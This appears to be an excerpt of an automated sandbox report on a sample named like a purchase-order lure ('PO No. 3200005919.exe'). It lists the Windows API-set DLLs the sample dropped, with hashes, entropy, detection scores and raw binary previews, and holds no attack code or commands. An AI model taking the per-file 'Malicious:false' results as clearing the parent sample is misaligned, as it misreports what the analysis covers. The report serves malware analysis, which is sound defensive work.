                                                                    SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                    SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                    SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):17712
                                                                    Entropy (8bit):7.187691342157284
                                                                    Encrypted:false
                                                                    SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                    MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                    SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                    SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                    SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):17720
                                                                    Entropy (8bit):7.19694878324007
                                                                    Encrypted:false
                                                                    SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                    MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                    SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                    SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                    SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.137724132900032
                                                                    Encrypted:false
                                                                    SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                    MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                    SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                    SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                    SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):20280
                                                                    Entropy (8bit):7.04640581473745
                                                                    Encrypted:false
                                                                    SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                    MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                    SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                    SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                    SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.138910839042951
                                                                    Encrypted:false
                                                                    SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                    MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                    SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                    SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                    SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19248
                                                                    Entropy (8bit):7.072555805949365
                                                                    Encrypted:false
                                                                    SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                    MD5:19A40AF040BD7ADD901AA967600259D9
                                                                    SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                    SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                    SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18224
                                                                    Entropy (8bit):7.17450177544266
                                                                    Encrypted:false
                                                                    SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                    MD5:BABF80608FD68A09656871EC8597296C
                                                                    SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                    SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                    SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18232
                                                                    Entropy (8bit):7.1007227686954275
                                                                    Encrypted:false
                                                                    SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                    MD5:0F079489ABD2B16751CEB7447512A70D
                                                                    SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                    SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                    SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19256
                                                                    Entropy (8bit):7.088693688879585
                                                                    Encrypted:false
                                                                    SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                    MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                    SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                    SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                    SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):22328
                                                                    Entropy (8bit):6.929204936143068
                                                                    Encrypted:false
                                                                    SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                    MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                    SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                    SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                    SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18736
                                                                    Entropy (8bit):7.078409479204304
                                                                    Encrypted:false
                                                                    SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                    MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                    SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                    SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                    SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):20280
                                                                    Entropy (8bit):7.085387497246545
                                                                    Encrypted:false
                                                                    SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                    MD5:AEC2268601470050E62CB8066DD41A59
                                                                    SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                    SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                    SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19256
                                                                    Entropy (8bit):7.060393359865728
                                                                    Encrypted:false
                                                                    SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                                                    MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                                                    SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                                                    SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                                                    SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18744
                                                                    Entropy (8bit):7.13172731865352
                                                                    Encrypted:false
                                                                    SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                                                    MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                                                    SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                                                    SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                                                    SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):28984
                                                                    Entropy (8bit):6.6686462438397
                                                                    Encrypted:false
                                                                    SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                                                    MD5:8B0BA750E7B15300482CE6C961A932F0
                                                                    SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                                                    SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                                                    SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):26424
                                                                    Entropy (8bit):6.712286643697659
                                                                    Encrypted:false
                                                                    SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                                                    MD5:35FC66BD813D0F126883E695664E7B83
                                                                    SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                                                    SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                                                    SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):73016
                                                                    Entropy (8bit):5.838702055399663
                                                                    Encrypted:false
                                                                    SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                                                    MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                                                    SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                                                    SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                                                    SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..
                                                                    Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):19256
                                                                    Entropy (8bit):7.076072254895036
                                                                    Encrypted:false
                                                                    SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                                                    MD5:8D02DD4C29BD490E672D271700511371
                                                                    SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                                                    SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                                                    SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
